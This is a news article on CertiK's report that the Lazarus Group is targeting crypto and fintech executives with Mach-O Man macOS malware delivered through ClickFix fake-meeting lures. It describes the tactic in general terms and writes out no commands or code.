TLDR
- CertiK said the Lazarus Group launched the Mach-O Man malware campaign targeting crypto and fintech executives.
- Researchers linked more than $500 million in recent exploits to activity connected with the Lazarus Group.
- The attackers used the ClickFix method to trick victims into running harmful terminal commands on macOS systems.
- Security experts said the malware grants access to corporate systems and financial platforms before erasing itself.
- CertiK warned that many affected firms may not yet realize their systems were compromised.
North Korean hackers have launched a new macOS malware campaign targeting crypto and fintech executives, security researchers said Wednesday. CertiK linked the activity to the Lazarus Group and warned that attackers now operate at institutional speed. The campaign, called Mach-O Man, has already coincided with more than $500 million in recent exploits.
Lazarus Group Expands Operations With Mach-O Man Malware
CertiK researcher Natalie Newson said the Lazarus Group developed Mach-O Man through its Chollima division. She described it as a modular macOS malware kit built with native Mach-O binaries for Apple systems.
She said attackers focus on fintech and cryptocurrency executives who control large digital assets. The group has accumulated about $6.7 billion in crypto loot since 2017.
In the past two weeks, hackers siphoned over $500 million from Drift and KelpDAO exploits. Newson said the activity shows coordinated and state-directed financial operations.
“What makes Lazarus especially dangerous right now is their activity level,” Newson said. She added that recent attacks show speed and scale similar to institutions.
She urged firms to treat the threat like banks treat nation-state actors. “They must view it as a constant and well-funded threat,” she said.
ClickFix Tactic Drives Direct Credential Theft
Researchers said Mach-O Man spreads through a social engineering method known as ClickFix. Newson said media reports often confuse the malware kit with the delivery method.
ClickFix prompts victims to paste a command into their Mac terminal to resolve a fake connection issue. Attackers send urgent meeting invitations through Telegram to initiate contact.
Mauro Eldritch, founder of BCA Ltd, said victims receive links for Zoom, Microsoft Teams, or Google Meet calls. The links lead to fake websites that mimic legitimate platforms.
The websites instruct executives to copy a simple command to fix a supposed technical error. Once executed, the command grants attackers access to corporate systems and SaaS platforms.
Security researcher Vladimir S. said attackers also hijacked DeFi project domains using similar tactics. In some cases, hackers replaced websites with fake Cloudflare pages requesting terminal commands.
“These fake verification steps guide victims through keyboard shortcuts that run a harmful command,” Newson said. She added that victims often initiate the breach themselves.
Traditional security controls fail because users execute the commands voluntarily. As a result, malware erases itself before detection.
Newson said many victims remain unaware of the breach. “They likely don’t know it yet,” she said.
She added that affected firms may struggle to identify which variant compromised their systems. CertiK reported the findings as part of ongoing threat monitoring this month.
